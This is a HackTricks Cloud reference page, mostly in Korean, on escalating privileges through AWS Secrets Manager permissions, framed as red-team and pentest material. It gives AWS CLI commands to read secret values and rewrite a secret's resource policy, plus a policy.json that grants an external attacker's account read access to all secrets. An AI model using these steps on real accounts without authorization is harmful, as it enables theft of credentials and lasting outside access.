AWS - Secrets Manager Privesc
Reading time: 2 minutes
tip
AWS 해킹 배우기 및 연습하기:
HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기:
HackTricks Training GCP Red Team Expert (GRTE)
Azure 해킹 배우기 및 연습하기:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
Secrets Manager
secrets manager에 대한 자세한 정보는 다음을 확인하세요:
secretsmanager:GetSecretValue
이 permission을 가진 attacker는 AWS Secretsmanager에 저장된 secret 내부의 저장된 값을 얻을 수 있습니다.
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value
잠재적 영향: AWS secrets manager 서비스 내부의 고도로 민감한 데이터에 접근할 수 있음.
warning
참고: secretsmanager:BatchGetSecretValue 권한이 있더라도 공격자는 민감한 비밀을 가져오기 위해 secretsmanager:GetSecretValue 권한도 필요합니다.
secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)
이전 권한으로는 give access to other principals/accounts (even external) 하여 secret에 접근할 수 있도록 만들 수 있습니다. KMS key로 암호화된 secret을 read secrets encrypted하려면 사용자가 access over the KMS key도 가지고 있어야 합니다 (more info in the KMS Enum page).
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json
policy.json:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}
tip
AWS 해킹 배우기 및 연습하기:
HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기:
HackTricks Training GCP Red Team Expert (GRTE)
Azure 해킹 배우기 및 연습하기:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
HackTricks Cloud